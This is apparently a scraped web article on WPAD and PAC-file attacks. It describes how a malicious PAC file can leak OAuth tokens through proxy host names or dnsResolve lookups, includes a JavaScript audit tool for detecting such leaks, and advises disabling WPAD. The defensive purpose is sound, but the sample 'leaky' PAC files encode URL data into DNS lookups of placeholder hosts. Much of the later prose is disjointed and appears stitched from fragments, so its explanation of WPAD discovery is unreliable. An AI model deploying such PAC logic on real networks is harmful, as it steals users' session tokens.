How does wpad dat work




















These redirects may encode security tokens as part of the URL.

The OAuth2 spec even warns about this. A malicious PAC file would have access to this information and could then leak it to an attacker. A simple way to do so would be to encode the information in the subdomain part of the proxy URL, which would in turn cause a DNS lookup containing the leaked token. If the attacker controls the DNS server (and this is pretty much possible with a fast DHCP server), he or she would then have retrieved the data.

Another option for the attacker would be to simply make a direct DNS request using the dnsResolve function available from inside the PAC file. Although this issue is not directly linked to WPAD, it does compound the problem.
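One way to check a PAC file for the two leak channels described above (the proxy host name and `dnsResolve`), as an added example that is not from the original post: it evaluates the script twice for the same host with different query strings and reports any output that changes. The sample PAC files, host names and helper stubs are constructed for illustration.

```javascript
// Stubs for the PAC helpers a script may call; DNS helpers record every lookup.
function pacEnv(dnsLog) {
  return {
    dnsResolve: (h) => { dnsLog.push(String(h)); return '192.0.2.1'; },
    isResolvable: (h) => { dnsLog.push(String(h)); return true; },
    isPlainHostName: (h) => !String(h).includes('.'),
    dnsDomainIs: (h, d) => String(h).endsWith(d),
    myIpAddress: () => '192.0.2.10',
  };
}

// Evaluate the PAC once for one URL; return the proxy string and the DNS names requested.
function runPac(pacSource, url, host) {
  const dnsLog = [];
  const env = pacEnv(dnsLog);
  const names = Object.keys(env);
  // new Function is NOT a sandbox: audit untrusted PAC files inside a disposable VM.
  const find = new Function(...names, pacSource + '\nreturn FindProxyForURL;')(
    ...names.map((n) => env[n]));
  return { proxy: String(find(url, host)), dns: dnsLog.join(',') };
}

// Differential test: same host, different query string. A PAC that only needs the
// host must answer identically; any difference means the full URL reaches an output.
function auditPac(pacSource) {
  const host = 'login.example.com';
  const a = runPac(pacSource, `https://${host}/cb?code=AAAA1111`, host);
  const b = runPac(pacSource, `https://${host}/cb?code=BBBB2222`, host);
  const channels = [];
  if (a.proxy !== b.proxy) channels.push('proxy-host');
  if (a.dns !== b.dns) channels.push('dnsResolve');
  return channels;
}

// Constructed sample PAC files (placeholder names under the reserved .example TLD).
const benignPac = `function FindProxyForURL(url, host) {
  if (isPlainHostName(host) || dnsDomainIs(host, ".corp.example")) return "DIRECT";
  return "PROXY proxy.corp.example:8080";
}`;
const leakyProxyPac = `function FindProxyForURL(url, host) {
  var tag = url.replace(/[^a-z0-9]/gi, "").slice(-8);
  return "PROXY " + tag + ".p.example:8080";
}`;
const leakyDnsPac = `function FindProxyForURL(url, host) {
  dnsResolve(url.replace(/[^a-z0-9]/gi, "").slice(-8) + ".d.example");
  return "DIRECT";
}`;
```

Because the check compares outputs rather than searching for a known token, it still flags a script that encodes the URL before leaking it.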

All clients with WPAD enabled would silently fall into the trap, and they would do so transparently. Only a security-conscious user who happens to open the proxy settings of their computer would notice that a proxy is in use. Even then, they would not notice the malicious behaviour until checking the PAC file or the network requests performed against the proxy. As another abstract from the upcoming BlackHat conference describes, WPAD attacks, although known for a while, are still a source of concern.

A sensible fix has been implemented by Microsoft. There is little reason for a PAC file to require access to the path to compute the right proxy for a host. If there is a legitimate PAC file out there that does this, a better alternative must surely be available. Therefore, the only way to make sure you are not exposed to the attack is to make sure WPAD is disabled. Most systems allow for per-network settings. There is no reason to keep WPAD enabled. This is of particular importance for WiFi networks.

Most laptops connect inadvertently to public WiFi access points. There are many ways to configure networks in Linux systems. If you are using netctl, ConnMan or another network manager, check its documentation. The DNS server must notice this and then proceed to point the browser to the host address where this file is located. This option specifies the exact location of the PAC file.

The file name does not need to follow any specific naming convention; however, if WPAD DNS is also to be used, the file must have the file name wpad. On Windows, this is based on the domain the machine is joined to, while on Linux and Mac OS X this is based on the Search Domain(s) configured in the network settings. In the following example, a Windows machine is joined to the domain uk. After checking the network settings, the browser identifies the host machine as being part of the domain uk.

The browser attempts to resolve wpad. The browser attempts and succeeds in resolving wpad.


